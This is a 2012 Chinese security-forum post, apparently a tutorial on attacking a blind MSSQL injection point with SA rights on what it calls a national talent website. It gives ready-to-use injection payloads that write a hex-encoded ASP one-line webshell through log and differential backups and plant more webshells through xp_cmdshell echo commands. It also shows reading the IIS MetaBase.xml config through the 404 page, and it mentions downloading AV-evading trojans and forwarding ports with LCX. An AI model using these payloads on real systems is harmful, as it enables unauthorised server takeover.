找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2259|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
' R' r; ~9 Z& {9 C+ N
: c7 h" Y2 F. Y7 X8 O5 I4 X4 i0 _2 b( Q* `" W" c$ F) L% G
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
1 f6 k+ j. w, u8 |9 {4 B# m, n1 r9 _" F( a
                                                                 
4 x& ?) Y0 Q/ ]  p                                                                 
- |3 a8 y/ G+ Z# f                                                                  论坛: http://www.90team.net/% r0 _# J: p4 I. \% |  ?

$ o5 }! P7 g! z+ a$ u
; x5 [3 }! ~4 ~
! {9 l8 r( x* O: Q友情检测国家人才网
3 g* s% J' G6 O4 B; _
9 a/ w2 A5 D  m" i
& p" M& P' @/ }内容:MSSQL注入SA权限不显错模式下的入侵% @/ h7 k* @. Y$ A

/ V- |& E; B3 r
% O" [3 @+ o* x* b& m. ^; F一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
0 I1 @% E. r8 P) n& C
. J/ X1 K. Y; @0 d: r我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。& P1 _; ?$ q. A( u0 k! B% j

5 x( V) H/ z9 U0 Y$ T+ R9 x; d8 f- l& U4 _# \: u
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。/ q  o: G- X% B4 \* d4 H7 F( ?( K

- s* x( N* q1 [思路:1 C3 ]. e5 B  W* {* {
) A2 g7 i9 U6 n3 E# T3 Q8 ^
首先:
7 G. u0 W1 A) }# }" I! G$ v& e, d
& w7 n% G: a$ ?/ g" k9 @" K( I通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。9 i! N8 Z  w/ {' R6 d6 O

" X" c, d) \0 k; ~8 y1.日志备份获得Webshell0 l* l( H+ I0 f& x6 O5 b& t

# h* t1 `$ S# q# {; U; e; I* r* a2.数据库差异备份获得Webshell/ i9 D% E/ }! Q4 R

( A- G8 Q# X; ]4.直接下载免杀远控木马。6 v5 O) q, F" P6 x, u7 L1 g

2 @1 W; ]* z# i) T5.直接下载LCX将服务器端口转发出来) q! w( x) U& M5 i

  @. J- U- |: s' n  _8 {6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。# P+ {8 X4 L3 g, s0 q& s

8 l4 f" ]$ u& L; c. g* Z
0 `9 }4 U7 U4 R3 L2 a$ G: P, Q/ W! Y5 l
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
) z/ ^9 i& C. A: B- }4 g
5 ^4 j- |. d1 ^! o我直接演示后面一个方法
/ W+ U$ D% a5 N; X, W% G, l9 ^* N( H

: d3 N3 A8 F; p. S% m0 W7 L分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
' `$ ]7 I" `; P( N1 o( M2 J) y; r6 s  k/ z+ n
: P, P8 E; D: v0 c* X9 a
* F; w8 A& T+ t& w$ k

" j1 ^) s6 h' Q) B- G- F$ U  `( _◆日志备份:
$ C: q( E+ g9 t* N6 r/ g$ g* f. L" ~- Z/ |  Y! t
& [$ s, v* [7 x0 t+ z' J
1. 进行初始备份
+ }1 W$ F+ E4 Y; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
+ X  J" w3 o- F3 b
: t9 N( X9 N' x3 n9 X9 F: X2. 插入数据
& k- m  u! J% R;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--/ _  }% [8 {; }- n. x; ?- W

- G: d! h7 p1 D7 g/ P% B& _0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
/ D$ e# @9 D# ?$ b! y  
2 n) A- w: a% O& m# f3. 备份并获得文件,删除临时表- [; c- t9 l6 Q; P$ c- d
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--* c4 j4 v  n/ @+ }

0 E( E3 M8 x; _  o2 M1 n* C/ x& `( g: b- m9 Y
1 H5 ^( J& |" ]
◆数据库差异备份1 ?9 Y1 q5 L; M* z

" S1 y! D8 Y' Q7 m(1. 进行差异备份准备工作0 O$ r6 J) s* `4 w$ y3 }
$ G: w% _# Q$ ^% @# L7 q/ F) Y
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--, ^! G; G: m, {/ I- ]

9 N4 \) B/ ?* v上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码+ g  T( A0 Y2 N9 t- M' D
7 M3 s  ]2 g% ~

5 Z* G1 n8 g: X3 ^1 r- Y(2. 将数据写入到数据库
- ?5 b: q5 z6 L8 o$ \;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
. L9 J* K% r, K# L% T: Z' M/ ~/ d- n' \; j9 f
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
/ g- s& ~: x6 T7 R( g/ a: e4 c( F2 O4 \$ x/ w" z- T; k
3. 备份数据库并清理临时文件
9 k" d; ?; h- j! |: ~9 k0 M* e
$ \' r8 k  A) J# m1 A8 ~;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--. N4 f, R& ~, Q# M( X/ @. T
0 y0 Y: n! r- Y& z) s& h
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 1 G0 D- {3 U0 n6 K6 n

* W( e& Z# u# A/ ~  q( U7 b3 ^" j. `( P, f2 \. n+ @

# G/ _  a$ [/ e  E- O9 a用^转义字符来写ASP(一句话木马)文件的方法:     U1 F7 q% F4 ?% w
% n; W' [7 K# L: v
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
+ Q% K9 N3 W; g  {$ C4 B; G( u( G# R
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp 7 }* {& F+ g2 y8 U5 z7 O

+ E$ M, T" H. m+ L. z1 L读取IIS配置信息获取web路径( H; Y+ U2 o1 Q% g  P

2 s" D0 I7 P. S3 E3 ]8 e7 \4 i     4 H" ~- Y. U# I! H9 y1 J( ~
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--* a6 L; I8 Z2 W
* `1 r" Q8 ?+ z4 `# E# f
执行命令
4 p3 w- C( M3 O1 O7 d5 v     
% [$ Q1 X5 O1 G. U* F- b     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
4 k2 F9 L! m0 T% q
$ E* K2 w* R1 A4 W/ y$ {1 s$ X6 t( T+ f1 m0 }6 E+ d6 A

6 `, L" z1 q, }& z: J
' A' C# Y5 h* g( K9 q4 ?( p: u; s6 a6 X$ y3 p8 W

7 n# J1 C2 m( S- a
. X* h- X, i9 L
& F# }9 ^, w9 G8 g5 O0 t! S9 k& V5 G
1 p% C+ i( D9 ^) @, \0 N; v& a6 m, N% w' k+ [% A. Q, V; l' C: S
! N6 Y: V2 ^) y7 n- N

) m: q9 s7 p5 e8 q! ~
8 z& W$ N  y- |% X# B% F1 Q- s6 {4 s: k# U
5 R% F* |4 y5 y( t- J

2 [6 W, K  z+ h! L* ~; e- H( Z6 L7 w! I& ^0 f& P" S8 Z9 g

+ ~( \9 i& }* W- P' z. R( E% @$ Z( T0 f1 l% x) H2 Q
5 p# }( {! h7 l6 t( h' C5 Y

( p! U7 Y! N" i* }6 z
: s# J7 N( S5 E9 @5 U, ?
, K! H( p! b8 E* V4 m4 m; n: X; H; A/ c

6 |2 N3 P6 ^. {1 n  S, k2 X7 T* ], e7 \) F

) Z9 X2 g' `8 n+ Q0 P& ?% B5 A0 @8 J" y9 W

; W- W# d4 _6 q6 D1 S
4 u7 o! q+ `0 ^' m4 C3 B: X+ p0 o- C8 X. }  h3 _; R

! V1 C( N) E, V  W& a' k1 P" X* O/ j( l/ A! a$ m) m
$ J" W" Q4 V8 N& ^4 @( A9 Q, v

/ u6 ^4 q+ a9 I$ k( n2 K& R
( Z% Y5 V: N) r: W6 U% j1 O
: _) X+ v1 m* e; Y- Y0 m
: }* i( z  [& h4 Z; m: B* O% o, \2 E0 X: k: v  ^5 t8 q1 m: r
% p# S) F: P4 V
' O, E- n; [4 e* Y

1 d! B& L0 J9 F$ a, t; {$ l% M' D, |! g4 Y
! `* M5 f; o5 G  f$ p5 m' m8 d

1 Z( A  L. v' q7 _% i3 ]7 z
+ r8 I6 Y( ]4 J: @% w9 ~
, m0 {: C* h  \7 f- {/ t0 {/ i0 F2 r
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表